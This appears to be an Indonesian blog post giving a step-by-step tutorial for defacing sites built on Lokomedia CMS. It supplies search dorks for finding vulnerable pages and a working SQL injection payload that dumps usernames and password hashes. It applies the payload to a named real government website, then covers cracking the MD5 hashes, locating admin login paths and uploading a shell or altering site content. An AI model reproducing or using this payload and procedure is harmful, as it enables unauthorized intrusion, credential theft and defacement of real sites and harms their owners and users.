Assalamualaikum W.r W.b
Bertemu lagi dengan saya TU4N B34R
Kali ini saya aka memberikan tutotial deface dengan cara SQL injection on Lokomedia CMS
Oke, simak baik baik ya...
BAHAN
1.Dork:inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
*nomer nya bisa di ubah agar bisa dapet yg fresh hehe
2.Exploit:
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
yaps langsung saja kita dorking memakai dork yg di atas tadi
- disini saya sudah mempunyai live target > http://kejari-kendari.go.id/statis-1profil.html
- yaps lalu kita masukan exploit nya di bagian setelah angka jadi seperti ini
http://kejari-kendari.go.id/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
(Terkadang suka bingung kan?pas memasukkan Exploit by tapi akhirnya Not Found...Di akhirnya URL itu kalian Tambahkan profil.html atau statis.html sesuaikan dengan hasil Dorking Kalian!masih belum paham?Chat saya!)
- setelah itu kita ambil user dan password, Tinggal kalian cari username dan password nya
Gimana bang kok gak bisa?tambah kan View-source di depan URL Target kalian!
-Dan Carilah username dan password nya
Lihat gambar di bawah ini
- yaps sudah terlihat user dan password nya tapi password nya masih berbentuk MD5 maka kita harus mendecrypt password tersebut menggunakan Hash Killer
- kalian bisa mendecrypt password tersebut disini Hash Killer
- mari kita decrypt password tersebut, yap dan hasilnya seperti ini
- dan ternyata username dan password nya itu adalah : admin100 dan user
- setelah itu kalian tinggal login ke halaman admin
- untuk login cms lokomedia biasanya di
-site.com/admin
-site.com/adminweb
-site.com /redaktur
-site.com/administrator
- yaps jika sudah menemukan admin login nya kalian bisa upload shell atau edit berita entahlah sesuka kalian
- ya mungkin cukup sekian
Wassalamualaikum Wr.Wb
AUTHOR:TU4N B34R
Halo kang tykung, apa kabar?
BalasHapusTykung dari mna njirr
Hapus